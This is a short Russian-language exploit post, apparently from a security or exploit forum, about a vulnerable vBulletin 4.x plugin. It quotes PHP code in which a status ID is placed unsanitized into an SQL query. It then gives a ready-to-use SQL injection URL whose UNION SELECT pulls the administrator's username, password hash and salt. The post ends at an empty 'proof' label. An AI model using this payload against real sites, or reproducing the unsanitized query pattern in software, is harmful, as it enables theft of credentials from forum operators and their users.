Плагин: http://www.vbulletin.org/forum/showthread.php?t=294260 Версия: <= 2.5 Версия vB: 4.x.x Уязвимый код находится в модуле misc_start hook и файле /includes/class_statusbit.php: public function process_fetch_status_item($status_id) { global $vbulletin; $status_item = $vbulletin->db->query_first(“SELECT * FROM “.TABLE_PREFIX.”status WHERE id=’$status_id'”); if ($status_item) { $status_item[‘message’] = htmlspecialchars_uni($status_item[‘message’]); $status_item[‘message’] = smartConvertPost($status_item[‘message’]); // parse image links $status_item[‘message’] = parse_youtubelinks($status_item[‘message’]); // parse youtube video links $status_item[‘message’] = nl2br(trim(fetch_censored_text($status_item[‘message’]))); if ($status_item[‘type’] == ‘poll’){ $poll_get = $vbulletin->db->query_read(“SELECT * FROM “.TABLE_PREFIX.”status_poll WHERE statusid='”.$status_item[‘id’].”‘”); if ($vbulletin->db->num_rows($poll_get) > 0){ $i = 0; while ($poll_item = $vbulletin->db->fetch_array($poll_get)){ $i ++; $status_item[‘message’] .= ‘<div style="margin:3px 0px;"><input type="radio" name="pollitems" id="pollitems_'.$i.'"><label>‘.$poll_item[‘fieldname’].’</label></div>‘; } } } return $status_item[‘message’]; } }SQL код: http://example.com/misc.php?do=ln_fetch_status_item&status_id=11' UNION SELECT null, concat(username, 0x3a, password, 0x3a, salt), null, null, null, null, null, null, null, null, null, null, null FROM user WHERE userid = '1 Пруф: